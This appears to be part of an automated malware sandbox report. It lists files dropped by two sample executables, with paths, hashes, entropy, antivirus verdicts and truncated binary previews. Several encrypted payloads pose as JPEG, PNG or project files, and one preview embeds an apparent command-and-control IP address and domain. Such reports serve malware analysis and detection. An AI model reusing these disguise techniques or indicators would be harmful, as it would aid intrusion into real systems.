}~........=..>.A

C:\Program Files (x86)\Twhtlb\Twhtlb.exe

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 0000000000000000.exe, Detection: malicious, Browse Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Twhtlb\log.src

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955227933758
Encrypted:	true
SSDEEP:	98304:TOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Go6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	D5DAA6B0F05E6952C2FC6C2C9DD926DA
SHA1:	D05FBB440454021DD3D13CC1F8DAFC2F37D3B063
SHA-256:	FDCA732089F42DA6DCC3B8A49F70CB0E3D0806A1C5D738FC9AE48E2AA2D42CC0
SHA-512:	187C2E24173D0C0AA5F1F212E52C5A4E4DA6D9D8DEEC6032ADDDB96B36AA50A1B57E4176F500097188F1E4DE81CE53366EA9319F77A7833F282D14DDCBBAE915
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\Twhtlb\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.9925172409973655
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/P:9S4+O6P5OeMRrjRy7aPZbm3k8V/P
MD5:	943A82259ADC43BA190DCF065B6DFC44
SHA1:	BA9A4476113722268370DB389B34A81710D5D49F
SHA-256:	A513814B92DB2F48B16F040EFB4AF1FE4187DEB7B24BC80B9632CA06191391BC
SHA-512:	70C15BC8F3629AF5788B74A07E95F3E7CFF86F598829B27AA047CD3C6942A6C0458A192C3899CB20DC44E58D270FC7F72C62E68CBF7B9416BAEC34E38A601B51
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Twhtlb\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399855600879
Encrypted:	true
SSDEEP:	6144:+iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:x8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	46C8ABB664EFD6D4ADA5D918E33597F6
SHA1:	867036038E0C95A7775D37410A173A9178978A05
SHA-256:	17E840DD56C2304C1D366DB92A46237177D6243746C1A0B481D26A1C14B6BAA5
SHA-512:	E68F8D351B3FCD412E5360BD9B36BAA144200E1CC5AAC5F0336A64C6F047CBEE4F1EB55C8AC8B452356AE9BFFA0B371AA91564953EFB730D3C0501EA1A8D473C
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.152.240...."ijstuvwxyz....ynyeqf.net......3#..............152.24....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\d[1].gif

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\f[1].dat

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.210952677725515
Encrypted:	false
SSDEEP:	12:Li4qkPIfdduXCCOEMBIDRzflcjmgUzWg3:u4yduxOEvNrlAuzWU
MD5:	2CAD33745064F8D09878A5E2E439F0F8
SHA1:	8EC79EB46C5025828DAD12A780A4A813A3D1305F
SHA-256:	4388E9177C40CC591CD3BA7421E15CC086CCABF3524E9DA3810362F9100419B1
SHA-512:	97ADDD833F1EDAD6E931DA4B8586EF173962868B1D8091A993B08D8CBA535D8A8B9E8C2E3498D8F8E6974E1DBD7B70F129F1E9A175997842DD9BD9A733A43972
Malicious:	false
Preview:	....l%00BI.Y1*w6EE.U;x70YZY^9p?2[KG\?/r?PR.^p97888888888888888888888888888888888PLLH;rgg..U.f} a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33AJ.Z2)t5FF.V8{43ZYZ]:s<1XHD_<,q<SQ._q86999999999999999999999999999999999QMMI:sff..T.g\|!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\a[1].gif

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s[1].dat

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.71159096953569
Encrypted:	false
SSDEEP:	384:9gegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQc:P5F1FUdy422IK+gAZt2i0YPpQn4GMz
MD5:	DB77A55916E3EC0311D54060C84F7F0F
SHA1:	23344C1EDB9785A1B44091BE74F61C5F2459584D
SHA-256:	9E470B3505D8C12D21B00559CC47815E9FF64CE4534A065192F8FC45B2CA4345
SHA-512:	945DE40C45189081D131D0B1F0C9CCBD88FB1AB2724F04BE927B10C89BAE55799D56BECF34F3198A7DBECD7DB03189B73C65E73BD51ADAC67F9B8E9ECDFE06E4
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..cbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\c[1].gif

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
